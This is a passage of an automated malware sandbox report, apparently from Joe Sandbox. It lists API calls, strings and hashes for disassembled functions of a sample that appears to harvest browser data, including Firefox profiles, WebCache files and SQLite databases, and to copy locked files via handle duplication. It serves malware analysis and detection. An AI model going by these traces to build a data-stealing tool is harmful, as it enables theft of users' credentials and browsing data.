                                                                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                        • memset.MSVCRT ref: 004040FC
                                                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                        • API String ID: 4039892925-3369679110
                                                                                                                                        • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                        • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                        • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                        • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                        APIs
                                                                                                                                        • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                        • API String ID: 3510742995-2641926074
                                                                                                                                        • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                        • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                        • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                        • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                        • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                        • free.MSVCRT ref: 0041848B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorFileLastfree
                                                                                                                                        • String ID: |A
                                                                                                                                        • API String ID: 981974120-1717621600
                                                                                                                                        • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                        • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                        • memset.MSVCRT ref: 004033B7
                                                                                                                                        • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                        • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                        • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                        • String ID: $0.@
                                                                                                                                        • API String ID: 2758756878-1896041820
                                                                                                                                        • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                        • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                        • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                        • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 00403C09
                                                                                                                                        • memset.MSVCRT ref: 00403C1E
                                                                                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                        • wcscat.MSVCRT ref: 00403C47
                                                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                        • wcscat.MSVCRT ref: 00403C70
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                        • API String ID: 1534475566-1174173950
                                                                                                                                        • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                        • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                        • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                        • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 669240632-0
                                                                                                                                        • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                        • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                        • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                        • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                        APIs
                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                        • memset.MSVCRT ref: 00414C87
                                                                                                                                        • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                        • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                        • API String ID: 2925649097-2036018995
                                                                                                                                        • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                        • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                        • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                        • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                        APIs
                                                                                                                                        • wcschr.MSVCRT ref: 00414458
                                                                                                                                        • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                        • String ID: "%s"
                                                                                                                                        • API String ID: 1343145685-3297466227
                                                                                                                                        • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                        • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                        • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                        • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 004087D6
                                                                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                        • memset.MSVCRT ref: 00408828
                                                                                                                                        • memset.MSVCRT ref: 00408840
                                                                                                                                        • memset.MSVCRT ref: 00408858
                                                                                                                                        • memset.MSVCRT ref: 00408870
                                                                                                                                        • memset.MSVCRT ref: 00408888
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2911713577-0
                                                                                                                                        • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                        • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                        • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                        • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID: @ $SQLite format 3
                                                                                                                                        • API String ID: 1475443563-3708268960
                                                                                                                                        • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                        • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                        • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                        • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsicmpqsort
                                                                                                                                        • String ID: /nosort$/sort
                                                                                                                                        • API String ID: 1579243037-1578091866
                                                                                                                                        • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                        • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                        • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                        • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModuleProcessTimes
                                                                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                        • API String ID: 116129598-3385500049
                                                                                                                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 0040E60F
                                                                                                                                        • memset.MSVCRT ref: 0040E629
                                                                                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                        Strings
                                                                                                                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                        • API String ID: 2887208581-2114579845
                                                                                                                                        • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                        • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                        • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                        • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                        APIs
                                                                                                                                        • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                        • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                        • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                        • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                        • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                        • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                        • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                        • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                        • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                        • API String ID: 2221118986-1725073988
                                                                                                                                        • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                        • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                        • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                        • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID: $$8
                                                                                                                                        • API String ID: 1475443563-435121686
                                                                                                                                        • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                        • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                        • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                        • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                        Strings
                                                                                                                                        • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                        • too many columns on %s, xrefs: 00430763
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                        • API String ID: 0-1445880494
                                                                                                                                        • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                        • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                        • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                        • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                          • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                          • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                          • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1979745280-0
                                                                                                                                        • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                        • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                        • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                        • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                        • memset.MSVCRT ref: 00403A55
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
